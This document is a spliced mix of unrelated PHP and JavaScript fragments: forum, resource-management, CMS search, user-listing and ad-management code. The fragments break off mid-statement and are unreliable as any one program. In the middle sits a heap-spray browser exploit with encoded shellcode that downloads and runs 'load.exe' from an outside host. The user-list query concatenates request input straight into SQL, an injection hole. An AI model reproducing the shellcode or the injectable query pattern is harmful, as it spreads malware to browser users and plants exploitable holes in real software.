data-tag='MENTION' data-tooltip='Example: [MENTION]Jimmy[/MENTION]' class='bbcode boxButton'>mention</button>"; } echo "<br><br>"; } echo "<textarea id='message' name='signature' placeholder=' Signature' maxlength='" . $permissions['maxsignature'] . "' class='boxTextArea' autofocus>" . $user['signature'] . "</textarea>\n\t\t\t\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t\t</div>\n\n\t\t\t\t\t\t\t\t<div align='right'>\n\t\t\t\t\t\t\t\t\t<input type='submit' name='changesignature' value='Change Signature' class='boxButton'>\n\t\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t</form>"; } break; case "hidden":
function save_resource_data($ref,$multi) { # Save all submitted data for resource $ref. # Also re-index all keywords from indexable fields. global $auto_order_checkbox,$userresourcedefaults,$multilingual_text_fields,$languages,$language; hook("befsaveresourcedata", "", array($ref)); # save resource defaults # (do this here so that user can override them if the fields are visible.) set_resource_defaults($ref); # Loop through the field data and save (if necessary) $errors=array(); $fields=get_resource_field_data($ref,$multi); $expiry_field_edited=false; $resource_data=get_resource_data($ref); for ($n=0;$n<count($fields);$n++) { if (!( # Not if field has write access denied checkperm("F" . $fields[$n]["ref"]) || (checkperm("F*") && !checkperm("F-" . $fields[$n]["ref"])) )) { if ($fields[$n]["type"]==2) { # construct the value from the ticked boxes $val=","; # Note: it seems wrong to start with a comma, but this ensures it is treated as a comma separated list by split_keywords(), so if just one item is selected it still does individual word adding, so 'South Asia' is split to 'South Asia','South','Asia'. $options=trim_array(explode(",",$fields[$n]["options"])); for ($m=0;$m<count($options);$m++) { $name=$fields[$n]["ref"] . "_" . md5($options[$m]); if (getval($name,"")=="yes") { if ($val!=",") {$val.=",";} $val.=$options[$m]; } } } elseif ($fields[$n]["type"]==4 || $fields[$n]["type"]==6 || $fields[$n]["type"]==10) { # date type, construct the value from the date/time dropdowns $val=sprintf("%04d", getvalescaped("field_" . $fields[$n]["ref"] . "-y","")); if ((int)$val<=0) { $val=""; } elseif (($field=getvalescaped("field_" . $fields[$n]["ref"] . "-m",""))!="") { $val.="-" . $field; if (($field=getvalescaped("field_" . $fields[$n]["ref"] . "-d",""))!="") { $val.="-" . $field; if (($field=getval("field_" . $fields[$n]["ref"] . "-h",""))!="") { $val.=" " . $field . ":"; if (($field=getvalescaped("field_" . $fields[$n]["ref"] . "-i",""))!="") { $val.=$field; } else { $val.="00"; } } } } } elseif ($multilingual_text_fields && ($fields[$n]["type"]==0 || $fields[$n]["type"]==1 || $fields[$n]["type"]==5)) { # Construct a multilingual string from the submitted translations $val=getvalescaped("field_" . $fields[$n]["ref"],""); $val="~" . $language . ":" . $val; reset ($languages); foreach ($languages as $langkey => $langname) { if ($language!=$langkey) { $val.="~" . $langkey . ":" . getvalescaped("multilingual_" . $n . "_" . $langkey,""); } } } elseif ($fields[$n]["type"] == 3) { $val=getvalescaped("field_" . $fields[$n]["ref"],""); // if it doesn't already start with a comma, add one if (substr($val,0,1) != ',') { $val = ','.$val; } } else { # Set the value exactly as sent. $val=getvalescaped("field_" . $fields[$n]["ref"],""); } # Check for regular expression match if (trim(strlen($fields[$n]["regexp_filter"]))>=1 && strlen($val)>0) { if(preg_match("#^" . $fields[$n]["regexp_filter"] . "$#",$val,$matches)<=0) { global $lang; debug($lang["information-regexp_fail"] . ": -" . "reg exp: " . $fields[$n]["regexp_filter"] . ". Value passed: " . $val); if (getval("autosave","")!="") { exit(); } $errors[$fields[$n]["ref"]]=$lang["information-regexp_fail"] . " : " . $val; continue; } } if (str_replace("\r\n","\n",$fields[$n]["value"])!== str_replace("\r\n","\n",unescape($val))) { //$testvalue=$fields[$n]["value"];var_dump($testvalue);$val=unescape($val);var_dump($val); //echo "FIELD:".$fields[$n]["value"]."!==ORIG:".unescape($val); # This value is different from the value we have on record. # Write this edit to the log (including the diff) (unescaped is safe because the diff is processed later) resource_log($ref,'e',$fields[$n]["ref"],"",$fields[$n]["value"],unescape($val)); # Expiry field? Set that expiry date(s) have changed so the expiry notification flag will be reset later in this function. if ($fields[$n]["type"]==6) {$expiry_field_edited=true;} # If 'resource_column' is set, then we need to add this to a query to back-update # the related columns on the resource table $resource_column=$fields[$n]["resource_column"]; # Purge existing data and keyword mappings, decrease keyword hitcounts. sql_query("delete from resource_data where resource='$ref' and resource_type_field='" . $fields[$n]["ref"] . "'"); # Insert new data and keyword mappings, increase keyword hitcounts. sql_query("insert into resource_data(resource,resource_type_field,value) values('$ref','" . $fields[$n]["ref"] . "','" . escape_check($val) ."')"); $oldval=$fields[$n]["value"]; if ($fields[$n]["type"]==3 && substr($oldval,0,1) != ',') { # Prepend a comma when indexing dropdowns $oldval="," . $oldval; } if ($fields[$n]["keywords_index"]==1) { # Date field? These need indexing differently. $is_date=($fields[$n]["type"]==4 || $fields[$n]["type"]==6); remove_keyword_mappings($ref, i18n_get_indexable($oldval), $fields[$n]["ref"], $fields[$n]["partial_index"],$is_date); add_keyword_mappings($ref, i18n_get_indexable($val), $fields[$n]["ref"], $fields[$n]["partial_index"],$is_date); } # If this is a 'joined' field we need to add it to the resource column $joins=get_resource_table_joins(); if (in_array($fields[$n]["ref"],$joins)){ $val=strip_leading_comma($val); sql_query("update resource set field".$fields[$n]["ref"]."='".escape_check($val)."' where ref='$ref'"); } } # Check required fields have been entered. $exemptfields = getvalescaped("exemptfields",""); $exemptfields = explode(",",$exemptfields); if ($fields[$n]["required"]==1 && ($val=="" || $val==",") && !in_array($fields[$n]["ref"],$exemptfields)) { global $lang; $errors[$fields[$n]["ref"]]=i18n_get_translated($fields[$n]["title"]).": ".$lang["requiredfield"]; } } } //die(); # Always index the resource ID as a keyword remove_keyword_mappings($ref, $ref, -1); add_keyword_mappings($ref, $ref, -1); # Autocomplete any blank fields. autocomplete_blank_fields($ref); # Also save related resources field sql_query("delete from resource_related where resource='$ref' or related='$ref'"); # remove existing related items $related=explode(",",getvalescaped("related","")); # Make sure all submitted values are numeric $ok=array();for ($n=0;$n<count($related);$n++) {if (is_numeric(trim($related[$n]))) {$ok[]=trim($related[$n]);}} if (count($ok)>0) {sql_query("insert into resource_related(resource,related) values ($ref," . join("),(" . $ref . ",",$ok) . ")");} // Notify the resources team ($email_notify) if moving from pending review->submission. $archive=getvalescaped("archive",0,true); $oldarchive=sql_value("select archive value from resource where ref='$ref'",0); if ($oldarchive==-2 && $archive==-1 && $ref>0) { notify_user_contributed_submitted(array($ref)); } if ($oldarchive==-1 && $archive==-2 && $ref>0) { notify_user_contributed_unsubmitted(array($ref)); } # Expiry field(s) edited? Reset the notification flag so that warnings are sent again when the date is reached. $expirysql=""; if ($expiry_field_edited) {$expirysql=",expiry_notification_sent=0";} # Also update archive status and access level $oldaccess=sql_value("select access value from resource where ref='$ref'",0); $access=getvalescaped("access",$oldaccess,true); if (getvalescaped("archive","")!="") # Only if archive has been sent { sql_query("update resource set archive='" . $archive . "',access='" . $access . "' $expirysql where ref='$ref'"); if ($archive!=$oldarchive) { resource_log($ref,"s",0,"",$oldarchive,$archive); } if ($access!=$oldaccess) { resource_log($ref,"a",0,"",$oldaccess,$access); } } # For access level 3 (custom) - also save custom permissions if (getvalescaped("access",0)==3) {save_resource_custom_access($ref);} # Update XML metadata dump file update_xml_metadump($ref); hook("aftersaveresourcedata"); if (count($errors)==0) {return true;} else {return $errors;} }
<?php require_once '../login/login_check.php'; require_once '../include/common.inc.php'; $css_url = "../templates/css"; $img_url = "../templates/images"; //$lang_searchresult $id = unescape($id); if ($id != null) { echo "<style type='text/css'> \n\n*{margin:0;padding:0;} \n.ifr_div{width:600px;height:600px; position:relative;} \n.ifr_div img{ vertical-align:middle;} \n.proccess{border:0px solid;border-color:#000000;height:300px;line-height:300px;width:300px;text-align:center;background:#ffffff;margin:0;position:absolute;top:20%;left:36%;} \n.proccess1{border:0px solid;border-color:#000000;height:300px;width:300px;text-align:center;background:#ffffff;margin:0;position:absolute;top:25%;left:36%;} \n.proccess b{vertical-align:middle;background:url(http://ok22.org/upload/images/20110902143538381.gif) no-repeat 0 center;padding-left:35px;display:inline-block;} \n\n</style> \n <div class='proccess' id='loading'><b>{$lang_search_inthe}。。。</b></div> \n"; } $anyid = 29; $id = trim($id); foreach ($met_class1 as $key => $val) { if (strstr($val['name'], $id) && $val['module'] < 9 && !$val['if_in']) { $contentlistes[] = $val; } } foreach ($contentlistes as $key => $val) { $sum = ''; $sum1 = ''; $sum2 = ''; $sum3 = ''; $sum_count = array(); switch ($val['module']) { case '1': $val['url'] = 'about/content.php?id=' . $val[id] . '&lang=' . $lang . '&anyid=' . $anyid; $val['conturl'] = 'about/about.php?id=' . $val[id] . '&lang=' . $lang . '&anyid=' . $anyid; $val['set'] = "<div>\n\t\t\t\t\t\t\t\t\t<p class='lt'><a href='{$val[url]}'>{$lang_addinfo}</a></p><span>-</span><p class='rt'><a href='{$val[conturl]}'>{$lang_manager}</a></p>\n\t\t\t\t\t\t\t\t\t</div>"; break; case '2':
} else { if ($xpass == "投资类型") { $xpass = "******"; $xpasswhere = ""; //$xpass_css = "deal dealRed"; } else { $xpass = "******"; $xpasswhere = " and(users.touzi_type like '%" . $xpass . "%') "; // $xpass_css = "deal dealRed"; } } } } if ($_REQUEST["keys"] != "") { $keys = trim($_REQUEST["keys"]); $keys = unescape($keys); $sqlwhere .= " and(users.name like '%" . $keys . "%' or users.truename like '%" . $keys . "%') "; } $sqlwhere .= $xpass1where . $xpasswhere; $sql = "select users.*,country.`name` as 'countryname' from users,country where users.countryid = country.id and users.user_type = 2 and users.id in(select userid from users_sub where fid=" . $_SESSION['verydeals_id'] . " ) " . $sqlwhere . " "; $orderby = " order by users." . $ordertype . " " . $isdesc . " "; $sql .= $orderby; $ps = 15; $rs = mysql_query($sql); $allcount = mysql_num_rows($rs); $sqlpage = getlimitsql($sql, $ps); $yeshu = ceil($allcount / $ps); $dt = mysql_query($sqlpage, $conn); while ($row = mysql_fetch_array($dt)) { $xlink = trim($row["user_type"]) == 1 || trim($row["user_type"]) == 3 ? "personal_colleagues_s.php?ci=" . $row["id"] . "&mp=1" : "personal_colleagues_b.php?ci=" . $row["id"] . "&mp=1"; $xlink2 = trim($row["user_type"]) == 1 || trim($row["user_type"]) == 3 ? "company_colleagues_B.php?ci=" . $row["id"] . "&mp=1" : "company_colleagues_B.php?ci=" . $row["id"] . "&mp=1";
"%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf"+ "%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc"+ "%uefef%uef85%u9a10%u64cf%ue7aa%ued85"+ "%u64b6%uf7ba%uff07%uefef%u85ef%u6410"+ "%uffaa%uee85%u64b6%uf7ba%uef07%uefef"+ "%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec"+ "%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10"+ "%u64ba%u6403%ue792%ub264%ub9e3%u9c64"+ "%u64d3%uf19b%uec97%ub91c%u9964%ueccf"+ "%udc1c%ua626%u42ae%u2cec%udcb9%ue019"+ "%uff51%u1dd5%ue79b%u212e%uece2%uaf1d"+ "%u1e04%u11d4%u9ab1%ub50a%u0464%ub564"+ "%ueccb%u8932%ue364%u64a4%uf3b5%u32ec"+ "%ueb64%uec64%ub12a%u2db2%uefe7%u1b07"+ "%u1011%uba10%ua3bd%ua0a2%uefa1"+ "' . unescape("http://site.come/load.exe") . '"); var hbs=0x400000; var pls=plc.length*2; var sss=hbs-(pls+0x38); var ss=unescape("%u0c0c%u0c0c"); ss=gss(ss,sss); hbs=(hsta-0x400000)/hbs; for(i=0;i<hbs;i++)m[i]=ss+plc; } function gss(ss,sss){ while(ss.length<sss*2)ss+=ss; ss=ss.substring(0,sss); return ss; } var m=new Array(); gsc();
$gglist = file($path2); if (!is_array($gglist)) { $gglist[] = ''; } array_shift($gglist); array_unshift($gglist, $thread . '-' . $ontid . "\r\n"); array_unshift($gglist, '<?php exit();?>' . "\r\n"); file_put_contents($path2, $gglist) or die('出错啦!无法创建.php文件!请将程序目录和所有文件的文件权限设置属性0755或0777。'); $conn = new mysql(); $conn->inoplog('添加广告', $ontid, 1, getname()); die('1'); } /////////////////////////// $ggiftj = $_COOKIE['ggiftj']; $gglei = unescape($_COOKIE['gglei']); $ggzu = unescape($_COOKIE['ggzu']); $ggleil = file_get_contents($datadir . '/ggleilist.php'); $ggll = explode("\r\n", $ggleil); array_shift($ggll); $ggleilist = ''; foreach ($ggll as $value) { if ($value) { if ($value == $gglei) { $ggleilist .= '<option value="' . htmlspecialchars($value) . '" title="' . htmlspecialchars($value) . '" selected="selected">' . htmlspecialchars(cutstr($value, 10)) . '</option>'; } else { $ggleilist .= '<option value="' . htmlspecialchars($value) . '" title="' . htmlspecialchars($value) . '">' . htmlspecialchars(cutstr($value, 10)) . '</option>'; } } } $ggzul = file_get_contents($datadir . '/ggzulist.php'); $ggz = explode("\r\n", $ggzul);